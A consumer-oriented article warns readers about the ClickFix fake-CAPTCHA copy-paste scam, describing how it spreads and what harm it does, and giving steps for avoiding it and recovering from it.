Don’t click ‘ClickFix’ boxes

You’re working on your laptop, searching websites for information, and suddenly a box pops up that indicates a vague problem with your browser. Do not, under any circumstance, follow the instruction in the box. It is a phishing scam called ClickFix and it is on the rise this past year according to multiple security research groups, including Check Point and Darktrace.

The scam requires the victim to copy code and primarily targets Windows systems, but in the past year has spread to the MacOS as well. It is often initiated by a fake CAPTCHA authorization. After multiple failures, the malware will suggest an alternative authorization method that involves copying code and pasting it into the system. They typically show up in fake websites, but the scams can also show up in legitimate but infected websites.

Malicious actors don’t need sophisticated training to launch these attacks. ClickFix malware kits are sold by cybercriminal organizations and state-sponsored groups. But the scam is not limited to infected websites. Cybercriminals leverage the TikTok and Instagram user bases to spread ClickFix scams. They create AI-generated videos that claim to unlock premium features by run “cheat codes” in software, including digital games. When the videos go viral, the reach hundreds of thousands of views and victims.

Zero-Trust attutudes

Perhaps unremarkably, the primary victims are males under the age of 30. This demographic is more susceptible to social engineering and more comfortable hacking their own systems. Despite high digital literacy, young men are more confident in handling technical issues themselves. The male-dominated gaming and tech culture, particularly Gen Z (12-29 year olds) are more than three times as likely to fall for online scams compared to baby boomers because they spend more time online where these scams proliferate. Women and older adults tend to exercise zero-trust attitudes more than young men and verify technical issues through official channels.

The scope of the damage caused by this crime is considerable. Victims suffer identity theft and financial loss and devices become part of illicit botnets. Businesses incur financial losses due to data breaches, recovery efforts, and potential legal liabilities. The average cost of a data breach can reach into the millions. ClickFix scams targeting critical infrastructure create severe consequences, potentially affecting public safety and national security. Disruptions in services like power, water, and transportation can lead to widespread chaos.

Protections

There are cybersecurity products against this kind of attack not available nor affordable to individuals. The best defense is to be aware of the danger.

No company selling software will ask you to voluntarily “fix” problems yourself. Any flaw in the product will be corrected in regular updates, which is why you should set up automatic installation of updates. Adopting a zero-trust attitude with websites and any pop up that requires interaction is crucial as well. Use ad blockers even if the website advises against them.

How to escape

But let’s say you inadvertently visited an infected website and the ClickFix box pops up. It will probably stop you from doing anything except by clicking the box. Do not continue. First close the browser. On Windows that means pressing Ctrl + Shift + Esc to open the Task Manager. Find your browser in the list, select it, and click End Task. On Mac, press Command + Option + Esc to open the Force Quit Applications window. Select your browser and click Force Quit.

Next, disconnect from the Internet by turning off Wi-Fi or unplugging the Ethernet cable to prevent any potential data transmission. After closing the browser, clear your cache and cookies to remove any remnants of the fake site. Use an antivirus or anti-malware software to run a full system scan to detect and remove any potential threats that may have been installed.

If you entered any personal information or passwords on the fake site, change those passwords immediately, especially for sensitive accounts like banking or email. Keep an eye on your financial accounts and online services for any suspicious activity. Report any unauthorized transactions to your bank or service provider.